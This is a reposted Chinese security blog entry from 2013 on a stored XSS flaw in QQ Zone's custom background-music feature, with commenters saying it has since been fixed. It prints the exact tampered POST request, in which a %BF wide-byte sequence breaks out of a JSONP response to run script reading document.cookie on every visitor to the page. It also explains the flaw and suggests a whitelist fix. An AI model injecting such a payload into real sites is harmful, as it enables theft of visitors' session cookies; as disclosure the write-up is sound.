记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

QQ空间存储XSS

2013-12-01 17:30
QQ空间存储XSS,访问用户空间首页自动触发
 
QQ空间,添加背景音乐,选择"添加网络背景音乐",任意输入Url,姓名,歌曲名等信息
 
拦截数据包,篡改url参数如下(两个xxx是当前用户qq号):
 
 
POST http://qzone-music.qq.com/fcg-bin/favnetsongtobgm.fcg?g_tk=1994248789 
 
......
 
 
 
formsender=1&source=102&url=http%3A%2F%2F112233%BF'}]}}});alert(document.cookie)//.mp3&songtitle=112233&singer=112233&desc=&inCharset=gb2312&uin=xxx&hostUin=xxx&notice=0&needNewCode=0&g_tk=1994248789&format=fs&platform=musicbox&outCharset=gb2312
 
 
然后其他用户访问该空间首页即触发XSS.
 
 
 
分析:
 
上述数据保存在服务器端后,通过一个JSONP加载,该JSONP的URL是
 
http://qzone-music.qq.com/fcg-bin/cgi_playlist_xml.fcg?json=1&uin=xxx&g_tk=5381
 
 
 
关于%BF, 请参考 http://www.hackdig.com/Article/201308/237227.html  ,不同的是这里是JSONP,所以无需<script>标签以及复杂的绕过方法,js即可!
 
修复方案:
严格点,用白名单吧
知识来源: www.2cto.com/Article/201312/260977.html

阅读:70957 | 评论:2 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“QQ空间存储XSS”共有2条留言

  1. hackdig @2013-12-03 18:05 回复

    @1 已经修复了

  2. 1 @2013-12-02 09:53 回复

    测试了下不成功呐,好像做了编码了,应该是已经修复了吧

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云